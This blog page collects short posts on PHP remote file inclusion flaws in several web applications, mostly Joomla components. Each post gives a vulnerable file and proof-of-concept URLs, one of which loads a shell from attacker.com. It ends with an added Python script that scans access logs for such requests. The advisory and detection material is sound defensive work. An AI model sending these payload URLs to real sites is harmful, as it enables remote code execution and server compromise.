Filed under: Hack, Never Endless Story | Tags: attack, Hack, hacking, job, script kiddies, security, vulnerable
Secure your system immediately,
because there are now a lot of script kiddies around.
I am deliberately posting on the topic of Remote File Include to add to our knowledge of hacking activities:
how far they could penetrate our system
and how they do it.
No system of ours is completely safe;
there is always a way for hackers to do their crazy actions.
So what should we do to secure our system?
How do we prevent hackers from entering our system?
Perhaps only we know the answer.
Creative and safe learning.
Filed under: Hack | Tags: bot, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies
################################################
[ Vulnerable File ]
http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[shell]
[ BUG IN ]
ajcuser.php
error in line 7
// include our comprofiler class
require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php');
################################################
Filed under: Hack | Tags: bot, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies
########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script : http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork : die("Hacking attempt");
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
#
#PoC : http://0wn3d.com/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
########################################################################
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI, script kiddies
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/main/anketa/new.php?site_path=[SHELL]
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=shell.txt
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/main/anketa/new.php?site_path=[SHELL]
From : http://www.securityfocus.com/bid/37235/exploit
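The requests in the posts above share two shapes that can be looked for in web server access logs: a parameter whose value is itself a URL, and a request that sets a path variable (mosConfig_absolute_path, site_path, pcConfig[smartyPath], or a GLOBALS[...] entry) directly. The following Python is an added example, not part of the original posts; the function names, the parameter-name list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request target inside a common/combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a URL or a PHP stream wrapper.
REMOTE_VALUE = re.compile(r'\s*(?:(?:https?|ftps?|php|expect)://|data:)', re.I)
# Names that set a superglobal or one of the path variables named in the posts
# (this list is an assumption; extend it for the applications you run).
PATH_NAME = re.compile(
    r'(?:GLOBALS|_SERVER|_REQUEST)\[|mosConfig_absolute_path$|site_path$|pcConfig\[')

def rfi_findings(log_line):
    """Return [(parameter, reason), ...] for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    findings = []
    query = m.group(1).partition('?')[2]
    # parse_qsl percent-decodes, so %5B and http%3A%2F%2F are seen decoded.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            findings.append((name, 'remote-url-value'))
        elif PATH_NAME.match(name):
            findings.append((name, 'path-variable-set-by-request'))
    return findings

def scan(lines):
    """Map line index -> findings, for lines with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := rfi_findings(line))}

# Constructed sample log lines (documentation addresses, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /components/com_ajaxchat/tests/'
    'ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://remote.invalid/s.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /path/main/anketa/new.php'
    '?site_path=http%3A%2F%2Fremote.invalid%2Fs.txt HTTP/1.1" 200 128',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /components/com_jcalpro/'
    'cal_popup.php?mosConfig_absolute_path=shell.txt HTTP/1.1" 200 64',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    for index, found in scan(SAMPLE_LOG).items():
        print(index, found)
```

A hit is a triage signal rather than proof of compromise: legitimate parameters such as redirect targets also carry URLs, so review flagged lines against the script they were sent to.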